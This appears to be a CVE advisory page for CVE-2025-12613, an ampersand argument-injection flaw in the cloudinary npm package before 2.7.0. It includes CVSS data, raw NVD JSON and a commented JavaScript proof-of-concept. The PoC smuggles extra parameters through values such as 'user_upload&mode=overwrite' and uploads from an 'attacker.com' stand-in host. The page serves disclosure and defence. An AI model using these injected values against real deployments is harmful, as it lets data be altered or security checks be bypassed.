Security Vulnerability Report
CVE-2025-12613 CVSS 8.6 HIGH

CVE-2025-12613

Published: 2025-11-10 05:15:43
Last Modified: 2026-04-15 00:35:42

Description

Versions of the package cloudinary before 2.7.0 are vulnerable to Arbitrary Argument Injection due to improper parsing of parameter values containing an ampersand. An attacker can inject additional, unintended parameters. This could lead to a variety of malicious outcomes, such as bypassing security checks, altering data, or manipulating the application's behavior. **Note:** Following our established security policy, we attempted to contact the maintainer regarding this vulnerability, but haven't received a response.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

No configuration data available.

cloudinary npm package < 2.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
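// CVE-2025-12613 PoC - Arbitrary Argument Injection in Cloudinary (cloudinary npm < 2.7.0)
//
// The advisory states that a parameter value containing an ampersand (&) was
// parsed by the library as one or more additional, separate parameters. This
// script only passes such values through the public API and prints what the
// library produces; it does not verify any server-side effect. The fix is to
// upgrade to cloudinary >= 2.7.0 and to validate/encode caller-supplied
// parameter values before they reach the SDK.
const cloudinary = require('cloudinary').v2;

// Scenario 1: transformation parameter injection.
// The overlay value carries '&gravity=center'. The generated URL is captured
// and printed so the outcome is observable (the original discarded the
// return value, so this scenario produced no visible result).
const generatedUrl = cloudinary.url('test.jpg', {
  transformation: [
    { width: 100, crop: 'scale' },
    { overlay: 'logo&gravity=center' }, // value containing an injected parameter
  ],
});
console.log('Generated URL:', generatedUrl);

// Scenario 2: upload parameter injection.
// Both public_id and folder carry an '&' followed by an extra key=value pair
// (the advisory's other example shape, public_id 'test&admin=true', is the
// same pattern). The callback returns early on error instead of also logging
// an undefined result.
cloudinary.uploader.upload(
  'https://attacker.com/malicious.jpg',
  {
    public_id: 'user_upload&mode=overwrite',
    folder: 'public&transformation=fl_ignore_aspect_ratio',
  },
  (error, result) => {
    if (error) {
      console.error('Upload error:', error);
      return;
    }
    console.log('Upload result:', result);
  },
);

// Scenario 3 (described in the advisory text, not exercised by this script):
// a delivery URL such as
//   https://res.cloudinary.com/demo/image/upload/w_300/samples/bird.jpg
// rewritten as
//   https://res.cloudinary.com/demo/image/upload/w_300&h_999/samples/bird.jpg
// is claimed to have '&h_999' treated as an extra height parameter. Whether an
// '&' inside a path segment is honoured is not demonstrated here — confirm
// against the fixed release before relying on this claim.

// Defense: validate and URL-encode parameter values before use, reject '&' in
// values that must be atomic, and upgrade to cloudinary >= 2.7.0.
console.log('PoC demonstrates parameter injection vulnerability');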

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12613", "sourceIdentifier": "[email protected]", "published": "2025-11-10T05:15:42.900", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Versions of the package cloudinary before 2.7.0 are vulnerable to Arbitrary Argument Injection due to improper parsing of parameter values containing an ampersand. An attacker can inject additional, unintended parameters. This could lead to a variety of malicious outcomes, such as bypassing security checks, altering data, or manipulating the application's behavior.\r\r**Note:**\rFollowing our established security policy, we attempted to contact the maintainer regarding this vulnerability, but haven't received a response."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-88"}]}], "references": [{"url": "https://github.com/cloudinary/cloudinary_npm/commit/ec4b65f2b3461365c569198ed6d2cfa61cca4050", "source": "[email protected]"}, {"url": "https://github.com/cloudinary/cloudinary_npm/pull/709", "source": "[email protected]"}, {"url": "https://security.snyk.io/vuln/SNYK-JS-CLOUDINARY-10495740", "source": "[email protected]"}]}}